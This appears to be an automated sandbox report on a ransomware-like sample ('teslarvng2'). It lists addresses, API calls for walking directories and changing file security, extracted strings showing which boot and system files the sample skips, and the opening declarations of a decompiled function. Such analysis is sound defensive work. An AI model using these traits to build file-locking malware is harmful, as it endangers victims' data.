                                                                    0x00000000
                                                                    0x00e67a74
                                                                    0x00e67a74
                                                                    0x00e67a76
                                                                    0x00e67b92
                                                                    0x00e67b95
                                                                    0x00e67b98
                                                                    0x00e67ba0
                                                                    0x00e67ba4
                                                                    0x00e67baa
                                                                    0x00e67bb0
                                                                    0x00e67bb5
                                                                    0x00e67bb8
                                                                    0x00e67bba
                                                                    0x00000000
                                                                    0x00e67bc0
                                                                    0x00e67bc0
                                                                    0x00e67bd0
                                                                    0x00e67be1
                                                                    0x00e67be7
                                                                    0x00e67bec
                                                                    0x00e67bfd
                                                                    0x00e67c02
                                                                    0x00e67c06
                                                                    0x00000000
                                                                    0x00e67c06
                                                                    0x00e67a7c
                                                                    0x00e67a7c
                                                                    0x00e67a81
                                                                    0x00000000
                                                                    0x00e67a87
                                                                    0x00e67a87
                                                                    0x00e67a89
                                                                    0x00e67b13
                                                                    0x00e67b16
                                                                    0x00e67b19
                                                                    0x00e67b21
                                                                    0x00e67b25
                                                                    0x00e67b2b
                                                                    0x00e67b31
                                                                    0x00e67b36
                                                                    0x00e67b39
                                                                    0x00e67b3b
                                                                    0x00000000
                                                                    0x00e67b41
                                                                    0x00e67b41
                                                                    0x00e67b51
                                                                    0x00e67b62
                                                                    0x00e67b68
                                                                    0x00e67b6d
                                                                    0x00e67b7e
                                                                    0x00e67b83
                                                                    0x00e67b87
                                                                    0x00000000
                                                                    0x00e67b87
                                                                    0x00e67a8f
                                                                    0x00e67a8f
                                                                    0x00e67a98
                                                                    0x00e67a9b
                                                                    0x00e67a9e
                                                                    0x00e67aa6
                                                                    0x00e67aa9
                                                                    0x00e67aaf
                                                                    0x00e67ab5
                                                                    0x00e67aba
                                                                    0x00e67abd
                                                                    0x00e67abf
                                                                    0x00000000
                                                                    0x00e67ac5
                                                                    0x00e67ac5
                                                                    0x00e67ad5
                                                                    0x00e67ae3
                                                                    0x00e67ae9
                                                                    0x00e67aee
                                                                    0x00e67aff
                                                                    0x00e67b04
                                                                    0x00e67b08
                                                                    0x00e67c88
                                                                    0x00e67c88
                                                                    0x00e67c90
                                                                    0x00e67c9a
                                                                    0x00e67c9f
                                                                    0x00000000
                                                                    0x00e67c9f
                                                                    0x00e67a91
                                                                    0x00e67a91
                                                                    0x00e67a96
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00e67a96
                                                                    0x00e67a8f
                                                                    0x00e67a89
                                                                    0x00e67a81
                                                                    0x00e67a76
                                                                    0x00e67a6e
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00e679c2
                                                                    0x00e679b9
                                                                    0x00e679af
                                                                    0x00e678a2
                                                                    0x00e6788a
                                                                    0x00e67872
                                                                    0x00e6785a
                                                                    0x00e67842
                                                                    0x00e6782a
                                                                    0x00000000
                                                                    0x00e67cb0
                                                                    0x00e67cb0
                                                                    0x00e67cb2
                                                                    0x00e67cb2
                                                                    0x00000000
                                                                    0x00e67800
                                                                    0x00e673cf
                                                                    0x00e673cf
                                                                    0x00e673dd
                                                                    0x00e673e2
                                                                    0x00e673e5
                                                                    0x00e673ed
                                                                    0x00e673ef
                                                                    0x00e673ef
                                                                    0x00e673f3
                                                                    0x00e673f8
                                                                    0x00e67402
                                                                    0x00e6741a
                                                                    0x00e6742c
                                                                    0x00000000
                                                                    0x00e67432
                                                                    0x00e6743a
                                                                    0x00e67441
                                                                    0x00e67446
                                                                    0x00e67449
                                                                    0x00e67451
                                                                    0x00e67453
                                                                    0x00e67453
                                                                    0x00e67459
                                                                    0x00e6745e
                                                                    0x00e67468
                                                                    0x00e6746d
                                                                    0x00e67471
                                                                    0x00e67476
                                                                    0x00e67478
                                                                    0x00e6747d
                                                                    0x00e67480
                                                                    0x00e67483
                                                                    0x00e67488
                                                                    0x00e6748b
                                                                    0x00e6748e
                                                                    0x00e67492
                                                                    0x00e67492
                                                                    0x00e674a5
                                                                    0x00e674aa
                                                                    0x00e674b1
                                                                    0x00e674b8
                                                                    0x00e674b8
                                                                    0x00e674bf
                                                                    0x00e674c6
                                                                    0x00e674cb
                                                                    0x00e674d5
                                                                    0x00e674da
                                                                    0x00e674da
                                                                    0x00e674e1
                                                                    0x00e674e6
                                                                    0x00e674f0
                                                                    0x00e674f8
                                                                    0x00e67512
                                                                    0x00e67512
                                                                    0x00e6742c
                                                                    0x00e673c9
                                                                    0x00e666f5
                                                                    0x00e666f5
                                                                    0x00e666f8
                                                                    0x00e666ff
                                                                    0x00e66704
                                                                    0x00e6670b
                                                                    0x00e66712
                                                                    0x00e66719
                                                                    0x00e6671f
                                                                    0x00e66724
                                                                    0x00e6672b
                                                                    0x00e6672e
                                                                    0x00e66735
                                                                    0x00e6673b
                                                                    0x00e6673e
                                                                    0x00e66742
                                                                    0x00e6674a
                                                                    0x00e6674d
                                                                    0x00e66753
                                                                    0x00e66759
                                                                    0x00e6675f
                                                                    0x00e66762
                                                                    0x00e66766
                                                                    0x00e6676b
                                                                    0x00e6676e
                                                                    0x00e66771
                                                                    0x00e66774
                                                                    0x00e66777
                                                                    0x00e6677b
                                                                    0x00e66785
                                                                    0x00e66790
                                                                    0x00e66790
                                                                    0x00e66792
                                                                    0x00e6679c
                                                                    0x00e667ab
                                                                    0x00e667ad
                                                                    0x00e667b0
                                                                    0x00e667b6
                                                                    0x00e667b8
                                                                    0x00e667bb
                                                                    0x00e667bf
                                                                    0x00e667c2
                                                                    0x00e667c5
                                                                    0x00e66809
                                                                    0x00e6680e
                                                                    0x00e66813
                                                                    0x00e667c7
                                                                    0x00e667c7
                                                                    0x00e667c9
                                                                    0x00e667cf
                                                                    0x00e667db
                                                                    0x00e667dd
                                                                    0x00e667e0
                                                                    0x00e667e6
                                                                    0x00e667e8
                                                                    0x00e667ee
                                                                    0x00e667f0
                                                                    0x00e667f7
                                                                    0x00e667fb
                                                                    0x00e667fb
                                                                    0x00e66819
                                                                    0x00e6681f
                                                                    0x00e66826
                                                                    0x00e6682c
                                                                    0x00e66830
                                                                    0x00e66832
                                                                    0x00e66835
                                                                    0x00e66837
                                                                    0x00e6683f
                                                                    0x00e66842
                                                                    0x00e66847
                                                                    0x00e6684a
                                                                    0x00e6684c
                                                                    0x00e6684c
                                                                    0x00e66850
                                                                    0x00e66850
                                                                    0x00e66859
                                                                    0x00e66860
                                                                    0x00e6686a
                                                                    0x00e66879
                                                                    0x00e6687b
                                                                    0x00e6687e
                                                                    0x00e66884
                                                                    0x00e66886
                                                                    0x00e66889
                                                                    0x00e6688d
                                                                    0x00e66890
                                                                    0x00e66893
                                                                    0x00e668d7
                                                                    0x00e668d9
                                                                    0x00e668dc
                                                                    0x00e668e1
                                                                    0x00e66895
                                                                    0x00e66895
                                                                    0x00e66897
                                                                    0x00e6689d
                                                                    0x00e668a9
                                                                    0x00e668ab
                                                                    0x00e668ae
                                                                    0x00e668b4
                                                                    0x00e668b6
                                                                    0x00e668b9
                                                                    0x00e668bc
                                                                    0x00e668be
                                                                    0x00e668c5
                                                                    0x00e668c9
                                                                    0x00e668c9
                                                                    0x00e668e7
                                                                    0x00e668ed
                                                                    0x00e668f4
                                                                    0x00e668fa
                                                                    0x00e668fe
                                                                    0x00e66900
                                                                    0x00e66903
                                                                    0x00e66905
                                                                    0x00e6690d
                                                                    0x00e66910
                                                                    0x00e66915
                                                                    0x00e66918
                                                                    0x00e6691a
                                                                    0x00e6691a
                                                                    0x00e6691e
                                                                    0x00e6691e
                                                                    0x00e66927
                                                                    0x00e66936
                                                                    0x00e66938
                                                                    0x00e66941
                                                                    0x00e66946
                                                                    0x00e66949
                                                                    0x00e6694d
                                                                    0x00e66953
                                                                    0x00e66959
                                                                    0x00e6695c
                                                                    0x00e6696e
                                                                    0x00e66970
                                                                    0x00e66973
                                                                    0x00e66978
                                                                    0x00e6695e
                                                                    0x00e6695e
                                                                    0x00e66960
                                                                    0x00e66963
                                                                    0x00e66963
                                                                    0x00e6697b
                                                                    0x00e6697d
                                                                    0x00e6698b
                                                                    0x00e6698d
                                                                    0x00e66996
                                                                    0x00e6699b
                                                                    0x00e6699e
                                                                    0x00e669a2
                                                                    0x00e669a8
                                                                    0x00e669b1
                                                                    0x00e669d2
                                                                    0x00e669d4
                                                                    0x00e669da
                                                                    0x00e669e5
                                                                    0x00e669b3
                                                                    0x00e669b9
                                                                    0x00e669bb
                                                                    0x00e669be
                                                                    0x00e669c4
                                                                    0x00e669c4
                                                                    0x00e669eb
                                                                    0x00e669eb
                                                                    0x00e669eb
                                                                    0x00e669fd
                                                                    0x00e66a02
                                                                    0x00e66a07
                                                                    0x00000000
                                                                    0x00e66a0d
                                                                    0x00e66a0d
                                                                    0x00e66a12
                                                                    0x00e66a18
                                                                    0x00e66a1e
                                                                    0x00e66ab0
                                                                    0x00e66ab7
                                                                    0x00e66a24
                                                                    0x00e66a24
                                                                    0x00e66a2a
                                                                    0x00e66a31
                                                                    0x00e66a38
                                                                    0x00e66a3b
                                                                    0x00e66a3e
                                                                    0x00e66a44
                                                                    0x00e66a4c
                                                                    0x00e66a52
                                                                    0x00e66a55
                                                                    0x00e66a56
                                                                    0x00e66a5b
                                                                    0x00e66a61
                                                                    0x00e66a67
                                                                    0x00e66a69
                                                                    0x00e66a6f
                                                                    0x00e66a72
                                                                    0x00e66a76
                                                                    0x00e66a85
                                                                    0x00e66a90
                                                                    0x00e66a93
                                                                    0x00e66a9d
                                                                    0x00e66aa0
                                                                    0x00e66aa0
                                                                    0x00e66aa4
                                                                    0x00e66aa4
                                                                    0x00e66abc
                                                                    0x00e66ac2
                                                                    0x00e66ac8
                                                                    0x00e66ace
                                                                    0x00e66b51
                                                                    0x00e66b53
                                                                    0x00e66ad0
                                                                    0x00e66ad0
                                                                    0x00e66ad3
                                                                    0x00e66ad9
                                                                    0x00e66ae0
                                                                    0x00e66ae9
                                                                    0x00e66aeb
                                                                    0x00e66aed
                                                                    0x00e66af3
                                                                    0x00e66af7
                                                                    0x00e66afc
                                                                    0x00e66afe
                                                                    0x00e66b01
                                                                    0x00e66b0a
                                                                    0x00e66b0d
                                                                    0x00e66b17
                                                                    0x00e66b1e
                                                                    0x00e66b2c
                                                                    0x00e66b2f
                                                                    0x00e66b39
                                                                    0x00e66b3c
                                                                    0x00e66b3c
                                                                    0x00e66b40
                                                                    0x00e66b40
                                                                    0x00e66b58
                                                                    0x00e66b5e
                                                                    0x00e66b64
                                                                    0x00e66b6a
                                                                    0x00e66c02
                                                                    0x00e66c04
                                                                    0x00e66b70
                                                                    0x00e66b70
                                                                    0x00e66b76
                                                                    0x00e66b7c
                                                                    0x00e66b82
                                                                    0x00e66b89
                                                                    0x00e66b92
                                                                    0x00e66b94
                                                                    0x00e66b98
                                                                    0x00e66b9e
                                                                    0x00e66ba2
                                                                    0x00e66ba7
                                                                    0x00e66ba9
                                                                    0x00e66bac
                                                                    0x00e66bb5
                                                                    0x00e66bb8
                                                                    0x00e66bc2
                                                                    0x00e66bcc
                                                                    0x00e66bda
                                                                    0x00e66bdd
                                                                    0x00e66be7
                                                                    0x00e66bea
                                                                    0x00e66bea
                                                                    0x00e66bee
                                                                    0x00e66bee
                                                                    0x00e66c09
                                                                    0x00e66c0f
                                                                    0x00e66c15
                                                                    0x00e66c9c
                                                                    0x00e66c9e
                                                                    0x00e66c17
                                                                    0x00e66c17
                                                                    0x00e66c1d
                                                                    0x00e66c24
                                                                    0x00e66c2b
                                                                    0x00e66c2e
                                                                    0x00e66c31
                                                                    0x00e66c37
                                                                    0x00e66c3f
                                                                    0x00e66c45
                                                                    0x00e66c48
                                                                    0x00e66c49
                                                                    0x00e66c4e
                                                                    0x00e66c50
                                                                    0x00e66c53
                                                                    0x00e66c5c
                                                                    0x00e66c5f
                                                                    0x00e66c63
                                                                    0x00e66c72
                                                                    0x00e66c77
                                                                    0x00e66c7a
                                                                    0x00e66c7d
                                                                    0x00e66c87
                                                                    0x00e66c87
                                                                    0x00e66c8b
                                                                    0x00e66c8b
                                                                    0x00e66ca3
                                                                    0x00e66caa
                                                                    0x00e66cb0
                                                                    0x00e66cb2
                                                                    0x00e66cbc
                                                                    0x00e66ccb
                                                                    0x00e66ccd
                                                                    0x00e66cd0
                                                                    0x00e66cd6
                                                                    0x00e66cd8
                                                                    0x00e66cdb
                                                                    0x00e66cdf
                                                                    0x00e66ce5
                                                                    0x00e66ceb
                                                                    0x00e66d35
                                                                    0x00e66d37
                                                                    0x00e66ced
                                                                    0x00e66ced
                                                                    0x00e66cef
                                                                    0x00e66cf5
                                                                    0x00e66cfc
                                                                    0x00e66d01
                                                                    0x00e66d07
                                                                    0x00e66d0a
                                                                    0x00e66d0c
                                                                    0x00e66d12
                                                                    0x00e66d14
                                                                    0x00e66d1b
                                                                    0x00e66d22
                                                                    0x00e66d22
                                                                    0x00e66d3c
                                                                    0x00e66d46
                                                                    0x00e66d4b
                                                                    0x00e66d4d
                                                                    0x00e66d57
                                                                    0x00e66d66
                                                                    0x00e66d68
                                                                    0x00e66d6b
                                                                    0x00e66d71
                                                                    0x00e66d73
                                                                    0x00e66d76
                                                                    0x00e66d7a
                                                                    0x00e66d80
                                                                    0x00e66d86
                                                                    0x00e66dd0
                                                                    0x00e66dd2
                                                                    0x00e66d88
                                                                    0x00e66d88
                                                                    0x00e66d8a
                                                                    0x00e66d90
                                                                    0x00e66d97
                                                                    0x00e66d9c
                                                                    0x00e66da2
                                                                    0x00e66da5
                                                                    0x00e66da7
                                                                    0x00e66dad
                                                                    0x00e66daf
                                                                    0x00e66db6
                                                                    0x00e66dbd
                                                                    0x00e66dbd
                                                                    0x00e66dd7
                                                                    0x00e66ddb
                                                                    0x00e66de1
                                                                    0x00e66de6
                                                                    0x00e66df0
                                                                    0x00e66df2
                                                                    0x00e66dfb
                                                                    0x00e66e00
                                                                    0x00e66e03
                                                                    0x00e66e07
                                                                    0x00e66e0c
                                                                    0x00e66e12
                                                                    0x00e66e18
                                                                    0x00e66e2b
                                                                    0x00e66e2d
                                                                    0x00e66e32
                                                                    0x00e66e1a
                                                                    0x00e66e1a
                                                                    0x00e66e1c
                                                                    0x00e66e1c
                                                                    0x00e66e37
                                                                    0x00e66e41
                                                                    0x00e66e43
                                                                    0x00e66e4c
                                                                    0x00e66e51
                                                                    0x00e66e54
                                                                    0x00e66e58
                                                                    0x00e66e5d
                                                                    0x00e66e63
                                                                    0x00e66e69
                                                                    0x00e66e7c
                                                                    0x00e66e83
                                                                    0x00e66e6b
                                                                    0x00e66e6b
                                                                    0x00e66e6d
                                                                    0x00e66e6d
                                                                    0x00e66e88
                                                                    0x00e66e88
                                                                    0x00e66e91
                                                                    0x00e66e9b
                                                                    0x00e66ea5
                                                                    0x00e66ead
                                                                    0x00e66eb3
                                                                    0x00e66eb5
                                                                    0x00e66eb8
                                                                    0x00e66ec8
                                                                    0x00e66ecd
                                                                    0x00e66ed7
                                                                    0x00e66ee6
                                                                    0x00e66ee8
                                                                    0x00e66ef1
                                                                    0x00e66ef6
                                                                    0x00e66ef9
                                                                    0x00e66efd
                                                                    0x00e66f02
                                                                    0x00e66f08
                                                                    0x00e66f0e
                                                                    0x00e66f1b
                                                                    0x00e66f26
                                                                    0x00e66f28
                                                                    0x00e66f10
                                                                    0x00e66f10
                                                                    0x00e66f12
                                                                    0x00e66f12
                                                                    0x00e66f2d
                                                                    0x00e66f39
                                                                    0x00e66f3e
                                                                    0x00e66f41
                                                                    0x00e66f48
                                                                    0x00e66f4d
                                                                    0x00e66f57
                                                                    0x00e66f5c
                                                                    0x00e66f63
                                                                    0x00e66f68
                                                                    0x00e66f6f
                                                                    0x00000000
                                                                    0x00e66f6f
                                                                    0x00e66a07
                                                                    0x00e66650
                                                                    0x00e66650
                                                                    0x00e66655
                                                                    0x00e6665b
                                                                    0x00e66662
                                                                    0x00000000
                                                                    0x00e66664
                                                                    0x00e66664
                                                                    0x00e6666d
                                                                    0x00e6666d
                                                                    0x00e66675
                                                                    0x00e681cf
                                                                    0x00e681cf
                                                                    0x00e681d4
                                                                    0x00e681d4
                                                                    0x00e681d5
                                                                    0x00e681da
                                                                    0x00e681da
                                                                    0x00e681db
                                                                    0x00e681e0
                                                                    0x00e681e0
                                                                    0x00e681e5
                                                                    0x00e681ea
                                                                    0x00e681ec
                                                                    0x00e681f1
                                                                    0x00e681f3
                                                                    0x00e681f8
                                                                    0x00e681fa
                                                                    0x00e68201
                                                                    0x00e68206
                                                                    0x00e68206
                                                                    0x00e6820b
                                                                    0x00e6820c
                                                                    0x00e6820d
                                                                    0x00e6820e
                                                                    0x00e6820f
                                                                    0x00e68210
                                                                    0x00e68211
                                                                    0x00e68213
                                                                    0x00e68215
                                                                    0x00e68220
                                                                    0x00e68221
                                                                    0x00e68224
                                                                    0x00e68229
                                                                    0x00e6822b
                                                                    0x00e6822e
                                                                    0x00e6822f
                                                                    0x00e68230
                                                                    0x00e68231
                                                                    0x00e68235
                                                                    0x00e6823b
                                                                    0x00e68244
                                                                    0x00e68246
                                                                    0x00e68250
                                                                    0x00e68250
                                                                    0x00e68257
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00e68262
                                                                    0x00e68267
                                                                    0x00e68278
                                                                    0x00e6827d
                                                                    0x00e68280
                                                                    0x00e68282
                                                                    0x00e6829a
                                                                    0x00e6829f
                                                                    0x00e682a2
                                                                    0x00e682a4
                                                                    0x00e682bc
                                                                    0x00e682c1
                                                                    0x00e682c4
                                                                    0x00e682c6
                                                                    0x00e682de
                                                                    0x00e682e3
                                                                    0x00e682e6
                                                                    0x00e682e8
                                                                    0x00e682f1
                                                                    0x00e682f4
                                                                    0x00e68311
                                                                    0x00e68319
                                                                    0x00e6831d
                                                                    0x00e68322
                                                                    0x00e68325
                                                                    0x00e6832c
                                                                    0x00e6832e
                                                                    0x00e68336
                                                                    0x00e6838e
                                                                    0x00e68391
                                                                    0x00e68396
                                                                    0x00e68399
                                                                    0x00e683a1
                                                                    0x00e683a6
                                                                    0x00e683aa
                                                                    0x00e683b2
                                                                    0x00e683b7
                                                                    0x00e68338
                                                                    0x00e68338
                                                                    0x00e68340
                                                                    0x00e68342
                                                                    0x00e6834d
                                                                    0x00e68352
                                                                    0x00e68355
                                                                    0x00e68359
                                                                    0x00e6835d
                                                                    0x00e6835f
                                                                    0x00e6835f
                                                                    0x00e68366
                                                                    0x00e6836b
                                                                    0x00e68372
                                                                    0x00e68379
                                                                    0x00e6837e
                                                                    0x00e68385
                                                                    0x00e6838a
                                                                    0x00e6838c
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00e6838c
                                                                    0x00e68340
                                                                    0x00e683ba
                                                                    0x00e683c4
                                                                    0x00e682f6
                                                                    0x00e68301
                                                                    0x00e68306
                                                                    0x00e68309
                                                                    0x00e6830b
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00e6830b
                                                                    0x00e682f4
                                                                    0x00e682c8
                                                                    0x00e682cb
                                                                    0x00e682cb
                                                                    0x00e682a6
                                                                    0x00e682a9
                                                                    0x00e682a9
                                                                    0x00e68284
                                                                    0x00e68287
                                                                    0x00e68287
                                                                    0x00e683d0
                                                                    0x00e683d2
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00e683d2
                                                                    0x00e68250
                                                                    0x00e683d8
                                                                    0x00e683dd
                                                                    0x00e683eb
                                                                    0x00e683f5
                                                                    0x00e6667b
                                                                    0x00e66683
                                                                    0x00e6669c
                                                                    0x00e666a7
                                                                    0x00e666aa
                                                                    0x00e666b4
                                                                    0x00e666b6
                                                                    0x00e666b6
                                                                    0x00e666b8
                                                                    0x00e666bc
                                                                    0x00e666c1
                                                                    0x00e666c4
                                                                    0x00e666ca
                                                                    0x00e666d4
                                                                    0x00000000
                                                                    0x00e666d4
                                                                    0x00e66675
                                                                    0x00000000
                                                                    0x00e666d9
                                                                    0x00e666d9
                                                                    0x00e666de
                                                                    0x00000000
                                                                    0x00e66650
                                                                    0x00000000

                                                                    APIs
                                                                    • Sleep.KERNEL32(000003E8,2B749D79,FFFFFFFF,?), ref: 00E66655
                                                                    • __Mtx_init_in_situ.LIBCPMT ref: 00E66941
                                                                    • __Mtx_init_in_situ.LIBCPMT ref: 00E66996
                                                                    • __Mtx_init_in_situ.LIBCPMT ref: 00E66DFB
                                                                    • __Mtx_init_in_situ.LIBCPMT ref: 00E66E4C
                                                                    • __Mtx_init_in_situ.LIBCPMT ref: 00E66EF1
                                                                    • __Mtx_unlock.LIBCPMT ref: 00E66F39
                                                                    • GetFileAttributesW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,2B749D79,FFFFFFFF,?), ref: 00E67158
                                                                    • GetFileAttributesW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,2B749D79,FFFFFFFF,?), ref: 00E6719D
                                                                    • GetFileAttributesW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,2B749D79,FFFFFFFF,?), ref: 00E671DD
                                                                    • GetFileAttributesW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,2B749D79,FFFFFFFF), ref: 00E6721D
                                                                    • GetFileAttributesW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,2B749D79), ref: 00E6725D
                                                                    • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,2B749D79,FFFFFFFF), ref: 00E673AB
                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,2B749D79,FFFFFFFF,?), ref: 00E673C0
                                                                      • Part of subcall function 00E86F30: SetNamedSecurityInfoW.ADVAPI32(00000000,00000001,00000001,00000000,00000000,00000000,00000000), ref: 00E86F54
                                                                      • Part of subcall function 00E86F30: SetEntriesInAclW.ADVAPI32(00000001,?,00000000,?), ref: 00E86F97
                                                                      • Part of subcall function 00E86F30: SetNamedSecurityInfoW.ADVAPI32(00000000,00000001,00000004,00000000,00000000,00000000,00000000), ref: 00E86FAB
                                                                    • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,2B749D79), ref: 00E67423
                                                                    • FindNextFileW.KERNEL32(?,?,?), ref: 00E676FA
                                                                    • GetLastError.KERNEL32 ref: 00E6771C
                                                                    • GetLastError.KERNEL32 ref: 00E6772B
                                                                    • FindClose.KERNEL32(?), ref: 00E677B5
                                                                    • __Mtx_unlock.LIBCPMT ref: 00E67C9A
                                                                    • __Mtx_unlock.LIBCPMT ref: 00E67D3E
                                                                    • GetCurrentThreadId.KERNEL32 ref: 00E67F67
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000F.00000002.240487908.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 0000000F.00000002.240483674.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240552864.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240572613.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240576935.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240605793.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000F.00000002.240617274.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: File$AttributesMtx_init_in_situ$Find$ErrorLastMtx_unlock$FirstInfoNamedSecurity$CloseCurrentEntriesNextSleepThread
                                                                    • String ID: BOOTSECT.BAK$EFI$UNC\$\ProgramData\Microsoft\Windows\SystemData$\Windows\System32\KernelBase.dll$\Windows\System32\user32.dll$\Windows\win.ini$\users\Default User$as windows drive$boot$bootmgr$bootmgr.efi$bootnxt$error at exploreing $grub$hiberfil.sys$in Exploreing Folder$list too long$pagefile.sys$skipped boot/grub/efi folder at $started exploring on $stock at DN check at $swapfile.sys$teslarvng2$treating path $vr$windows
                                                                    • API String ID: 450646495-2796607333
                                                                    • Opcode ID: 035e8b1abc0787277c5e8792fe0dfdaf91bb79e53d0e9996fe9019d1cdcc82f8
                                                                    • Instruction ID: 68a9e6dfd02699c7a6193075ddfe1b7ce96be6bfdc726b99bd029c92897f06fe
                                                                    • Opcode Fuzzy Hash: 035e8b1abc0787277c5e8792fe0dfdaf91bb79e53d0e9996fe9019d1cdcc82f8
                                                                    • Instruction Fuzzy Hash: 0513AA70900258DFDB21DF64D945B9EBBF4AF05308F1451A9E449BB292EB70AF88CF91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 65%
                                                                    			E00E64AE0(void* __ebx, signed int __ecx, char __edx, signed char* __edi, void* __esi, char _a4, intOrPtr _a24) {
                                                                    				char _v8;
                                                                    				char _v16;
                                                                    				signed int _v20;
                                                                    				char _v24;
                                                                    				intOrPtr _v32;
                                                                    				signed int _v40;
                                                                    				signed int _v44;
                                                                    				char _v56;
                                                                    				char _v60;
                                                                    				signed int _v64;
                                                                    				char _v76;
                                                                    				char _v80;
                                                                    				signed int _v84;
                                                                    				char _v96;
                                                                    				char _v100;
                                                                    				signed int _v104;
                                                                    				char _v116;
                                                                    				char _v120;
                                                                    				signed int _v124;
                                                                    				signed int _v128;
                                                                    				signed char _v132;
                                                                    				signed int _v136;
                                                                    				signed int _v140;
                                                                    				intOrPtr _v144;
                                                                    				signed int _v148;
                                                                    				char _v164;
                                                                    				void* _v168;
                                                                    				signed int _v172;
                                                                    				intOrPtr _v176;
                                                                    				signed char _v180;
                                                                    				long _v188;
                                                                    				char _v212;
                                                                    				char _v236;
                                                                    				char _v260;
                                                                    				char _v284;
                                                                    				char _v308;
                                                                    				char _v332;
                                                                    				char _v356;
                                                                    				char _v380;
                                                                    				char _v404;
                                                                    				signed int* _v408;
                                                                    				char* _v412;
                                                                    				char* _v416;
                                                                    				char* _v420;
                                                                    				char* _v424;
                                                                    				char* _v428;
                                                                    				long* _v432;
                                                                    				char* _v436;
                                                                    				char* _v440;
                                                                    				char* _v444;
                                                                    				char* _v448;
                                                                    				signed int* _v452;
                                                                    				char* _v456;
                                                                    				char* _v460;
                                                                    				char _v464;
                                                                    				char _v492;
                                                                    				struct _WIN32_FIND_DATAW _v780;
                                                                    				char _v781;
                                                                    				signed int _v788;
                                                                    				signed int _v792;
                                                                    				signed int _v796;
                                                                    				long _v800;
                                                                    				signed int _v804;
                                                                    				signed int _v808;
                                                                    				void* _v812;
                                                                    				signed int _v816;
                                                                    				signed int _v820;
                                                                    				signed int _v824;
                                                                    				signed int _v828;
                                                                    				signed char* _v832;
                                                                    				signed int _v836;
                                                                    				signed int _v840;
                                                                    				signed char _v844;
                                                                    				signed char _v848;
                                                                    				signed int _v852;
                                                                    				intOrPtr _v856;
                                                                    				signed int _v860;
                                                                    				intOrPtr _v864;
                                                                    				signed int _v868;
                                                                    				intOrPtr _v872;
                                                                    				signed int _v876;
                                                                    				intOrPtr _v880;
                                                                    				intOrPtr _v884;
                                                                    				intOrPtr _v888;
                                                                    				signed int _v892;
                                                                    				signed int _v896;
                                                                    				char _v912;
                                                                    				char _v936;
                                                                    				intOrPtr _v940;
                                                                    				signed int _v948;
                                                                    				char _v956;
                                                                    				signed int _v964;
                                                                    				void* __ebp;
                                                                    				signed int _t675;
                                                                    				signed int _t676;
                                                                    				signed char _t684;
                                                                    				signed int _t685;
                                                                    				void* _t688;
                                                                    				long _t689;
                                                                    				signed int _t691;
                                                                    				intOrPtr _t694;
                                                                    				signed int _t696;
                                                                    				signed int _t700;
                                                                    				signed int _t701;
                                                                    				intOrPtr _t704;
                                                                    				intOrPtr _t706;
                                                                    				void* _t709;
                                                                    				intOrPtr _t742;
                                                                    				intOrPtr _t744;
                                                                    				void* _t755;
                                                                    				intOrPtr _t794;
                                                                    				intOrPtr _t801;
                                                                    				signed int _t812;
                                                                    				signed int _t813;
                                                                    				signed int _t817;
                                                                    				intOrPtr* _t824;
                                                                    				signed int _t826;
                                                                    				signed int _t830;
                                                                    				signed int _t831;
                                                                    				signed int _t834;
                                                                    				intOrPtr _t837;
                                                                    				signed int _t838;
                                                                    				signed int _t839;
                                                                    				signed int _t851;
                                                                    				signed int _t852;
                                                                    				intOrPtr _t856;
                                                                    				intOrPtr _t860;
                                                                    				signed int _t862;
                                                                    				signed int _t863;
                                                                    				signed int _t864;
                                                                    				signed int _t866;
                                                                    				intOrPtr* _t868;
                                                                    				signed int _t871;
                                                                    				signed int _t872;
                                                                    				intOrPtr _t876;
                                                                    				intOrPtr _t880;
                                                                    				signed int _t882;
                                                                    				signed int _t883;
                                                                    				signed int _t884;
                                                                    				signed int _t886;
                                                                    				intOrPtr* _t888;
                                                                    				signed int _t892;
                                                                    				intOrPtr _t894;
                                                                    				intOrPtr _t898;
                                                                    				intOrPtr _t906;
                                                                    				intOrPtr _t910;
                                                                    				signed int _t917;
                                                                    				intOrPtr _t919;
                                                                    				intOrPtr _t922;
                                                                    				signed int _t924;
                                                                    				signed int _t925;
                                                                    				signed int _t926;
                                                                    				signed int _t928;
                                                                    				intOrPtr* _t930;
                                                                    				signed int _t934;
                                                                    				signed int _t937;
                                                                    				signed int _t941;
                                                                    				signed char _t947;
                                                                    				signed char _t948;
                                                                    				intOrPtr _t949;
                                                                    				signed int _t950;
                                                                    				signed int _t951;
                                                                    				signed char _t962;
                                                                    				int _t964;
                                                                    				void* _t968;
                                                                    				void* _t969;
                                                                    				intOrPtr* _t970;
                                                                    				signed int _t975;
                                                                    				signed int _t976;
                                                                    				signed int _t977;
                                                                    				signed int _t978;
                                                                    				void* _t982;
                                                                    				signed int* _t1001;
                                                                    				char* _t1002;
                                                                    				char* _t1003;
                                                                    				char* _t1004;
                                                                    				signed int _t1071;
                                                                    				signed int _t1076;
                                                                    				signed int _t1085;
